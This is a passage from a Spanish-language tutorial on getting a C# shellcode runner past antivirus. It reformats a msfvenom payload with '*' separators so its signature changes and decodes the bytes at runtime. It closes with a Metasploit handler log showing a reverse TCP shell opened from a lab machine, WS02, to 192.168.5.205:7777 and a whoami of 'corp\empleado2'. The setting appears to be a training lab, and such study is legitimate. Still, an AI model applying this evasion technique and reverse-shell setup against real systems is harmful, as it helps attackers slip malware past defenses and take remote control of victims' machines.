Siguiendo el codigo en C# de la parte anterior igualmente ese codigo lo puede seguir detectando algunos antivirus, ya que el payload que hemos utilizado lo hemos pegado directamente sin realizar ninguna modificacion al mismo, por eso el poder ser detectados, por lo que vamos a realizar alguna modificacion de la siguiente forma:
En este caso vamos a utilizar el editor de archivos llamado emacs para que todo esto vaya de forma mas automatizada:
emacs
Una vez dentro abriremos una nueva hoja y pegaremos el siguiente payload del codigo anterior:
Ahora vamos a quitar las , haciendo lo mismo que antes, pero en esta parte donde nos da a elegir 2 opciones pondremos primero donde habiamos puesto el 0x pondremos una , y en la segunda parte donde pusimos el * pondremos nada para dejarlo vacio y que se eliminen, quedando algo asi:
Ahora solo tendremos que quitar todos los saltos de linea para que quede todo en una unica linea y le pondremos " al principio y final de la siguiente forma:
Lo que estamos haciendo en esta parte del codigo string payload = "fc*e8*8f*00*...."; es definir el payload que hemos modificado separado por *.
Despues en esta otra parte del codigo string[] temp_payload = payload.Split('*'); lo que estamos haciendo es que cuando encuentre un * lo separe/parta para que tengamos una cadenas de bytes.
En esta parte byte[] payload_final = new byte[temp_payload.Length]; simplemente estamos definiendo un array para posteriormente poder utilizarlo con el payload.
En el bucle for lo que estamos haciendo es que va recorriendo cada uno de los strings del payload que hemos modificado para poder convertir cada uno de los * en bytes.
La diferencia de todo esto es que la firma que llevaba antes de msfvenom era muy reconocible, pero ahora al crear nuestro propio payload es una firma propia, por lo que sera muy complicado de que un antivirus lo detecte actualmente.
Ahora vamos a volverlo a compilar y nos lo vamos a pasar a la maquina WS02 el cual tiene el antivirus activado, cuando nos lo pasemos veremos que ni siquiera nos da un aviso de que pueda ser un malware por lo que esta funcionando de forma correcta, si nos volvemos a poner a la escucha en msfconsole con el multi/handler y ejecutamos el binario desde la maquina WS02 y volvemos a donde tenemos la escucha:
[*] Started reverse TCP handler on 192.168.5.205:7777
[*] Sending stage (240 bytes) to 192.168.5.209
[*] Command shell session 1 opened (192.168.5.205:7777 -> 192.168.5.209:52504) at 2025-02-06 04:07:26 -0500
Shell Banner:
Microsoft Windows [Versi_n 10.0.19045.3803]
(c) Microsoft Corporation. Todos los derechos reservados.
C:\Users\empleado2\Desktop>
-----
C:\Users\empleado2\Desktop>whoami
whoami
corp\empleado2
Veremos que efectivamente nos esta creando una shell sin ningun tipo de problema y sin que el antivirus detecte absolutamente nada.